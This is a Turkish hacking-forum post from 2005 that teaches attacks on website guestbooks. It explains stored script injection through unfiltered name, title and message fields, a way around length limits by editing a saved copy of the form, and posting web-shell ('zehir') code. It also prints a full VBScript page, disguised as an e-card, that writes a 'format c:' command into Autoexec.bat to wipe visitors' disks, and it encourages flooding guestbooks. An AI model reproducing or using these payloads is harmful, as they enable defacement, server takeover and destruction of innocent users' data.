BLOKED

TERÖR
22-10-2005, 13:57
. Eski bir olay ama, bilmeyenler çok var.

Ben de oturuup, yazayım dedim olayı.

İlk olarak Mantık önemli . Ziyaretçi defteleri sizden, Mesaj , başlık vede bazıları nick, mail isterler. Şİmdi Siz oraya mesajınızı yazın, başlığınmızı düzgün atın. Güzel bişler yazın. Ve gönder dediğinizde, yazdıklarınız FİLTRE lerden geçerek [u>MSSQL , MYSQL ,MDB,TXT hangi veri tabanını kullanoıyorsa oraya yazdıklarınız kaydoluyor. Daha sonrada, Sizi Ziyaratçi defterinin sayfasına yönlendirtiyor. Aa bir bakıyorsunuz SİZİn yadıklarınız çıkmış ordaa. Yani ben bu yöntemle siteye bişiler yazdırabiliyorum. Hımm Şimdi burda ben öyle birşey yazdırmalıyım ki, Orda o kod , java artık ne yazdırııyorsam orda ÇALIŞMALI.

Olayımız problemmimiz budur. Bana gelen sorular şöylee ? Ziyaretçi defterine ne tür zararlar veririz..

- Eğer Ziyaretçi defteri Gerekli Filtrelemeleri yapmadı ise, Siz herşeyi yapaiblirisiniz. . Eğer ki Önlem alınmadı isee devam ediiiyorum..

Basit bildiğiniz bişi bu, 1 sn sonra site istediğiniz yere yönlenecek bir KOD verecem. Orda 1 yerine iseter 0 ,iseterse 3 size kalmış cinsi saniyedir ama..
&lt**** [Only registered and activated users can see links] content=1;URL=[Only registered and activated users can see links]>


Bakınız Bunu, Nick, başlık, mesaj kısmına neresi göreyorsanız oraya yazın. Çünkü webmaster Mesaj kısmına Fİltre koydu ise, siz Başlık kısmı sayesiyle yönlenecektir bu seferde.

Şİmdi bazı akıllı Webmasterlar, BAşlık kısmına 20 harf ilee kısıtlıyor. Siz o sayfayı PC nize kaydedin HTML olarak . Sonra o html sayfasını Notepad de açın. Action değerini düzeltin. vede BAşlık İnputundaki maxlength=21 size="37" gibi iki değer yada birini görürsünüz. Onları silin ve tekrar SAve edin. Sonra O PC nizdeki HTML yi çalıştırın ve kodlarınızı tekrar yzın. Başlık kısmınada. BU sefer başlık kısmında TÜm kodu yazabileceksiniz . Sonra SEND ne vardsa Gönder deyin. VEde böylelikle hem kendi PC nizden POST yapmılş olacaksınız, hemde webmaster ın o 20 karakter korumasını geçmiş olacağız. Böylece, başlık kısmında ekstra filtreleme yapmadığı için , Sizin kod çalışmış olacaktır..


Bakınız, MESAj kısmında Eğer sizin yönlendirme çalışıyor isee, unutmayın. O Ziyaaretçi defterinde FSO yani Zehir çalıştırma şansınızda vardır. ASP bir site ise, asp türü zehir, yada php türü
. NASIL Zehir atarım peki?

-BAsit beyler. Mesaj kısmı bölümüne, Yaa UPLOAD FSO lu kodlarını Yazarsınız, yada Zehir 2,3,4 ne versa, onun kodlarını O mesaj kısmınaa yazın. Vede gönderin. Eğer yönlendirme çalışıyor ise, bu zehir in çalışmasıda %50 dir. Ayrıca, zehir 2 3 yüklerseniz, pacth kısmını = ziyaretçi defterin ana sayfası asını yazın. Olay budur. Ziyarteçi defteri içinde siizin Zehir de çalışacaktır.

Ama eğer komplex , filtreli bir Ziyaretçi defteri isee, yemez buu =))

Mesela Size başka bir şeyden bahsedim, yabancı Guestbooklara saldırı anlatayım. Ama bu seferkinde, siz yabancılara zarar vereceksiniz :idea: nasılmı. .. Yabancıların PC lerine FORMAT attırmak istersinzi dimi.. Eğer sizin yönlendirme çalışıyor isee, ziyaeretçi defterinde, buu kod da çalışacaktır.


&lthtml>
&lthead>
&lt**** [Only registered and activated users can see links]"Content-Type" content="text/html; charset=iso-8859-9">
&lttitle>TERÖR</title>
</head>
&ltbody>
&ltscript language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
&ltp>Giriste acılan uyariya "HAYIR" dediyseniz &lta
href= "&lti>javascript</i>:reload()">Malesef e-kart ınız calısmayacaktır.</p>
</body>
</html>


bu olay. YA bunu ziyaretçi defterine mesaj kısmına yazığı gönderin yada, bu kodları HTML yapıp. kendi siztenize , Free hostunuzaa yükleyin. VEDE ziyaretçi defterinide Yönlendirme kodu ilee ,bu html ye yönlendirrir. Her iki olayda aynı kapıya çıkar.




ayrıca size yamayı unutum. Şimdi eğer Fİltre var ise nolur?
- Basit Hiç biş , sizin kod çalışmaz vede ziyaretçi defterinde o kodunuz kalır. Biraz değişmiş şekli ilee .. KOrunma yöntemöleride kolay. İSteyene yazabilirim onlarıda..

Bir soru gelmişti bana., Ziyaretçi defterine SQL İnjeciton yapılırmuı diye?Yapsanda işine yaramaz. Ayrıca yapılacak bir yeride yok . :cool2: BElki Komplex bir yapı vardsa, zorlasak yapılabilir. Ondada SQL injeciton yazımda, okuyabilirisniz. Veri tabanını havaya uçurmayı hahah =)


Ayrıca Ziyaretçi defterlerine FLOOD da yapılabilir. bulduğunuz 100 defterden anında =) FLOOD işee yarar. hahah :yes: bunaa önlem almıyoo ne yazııkii.. Böylece Db i şişirebilirsiniz.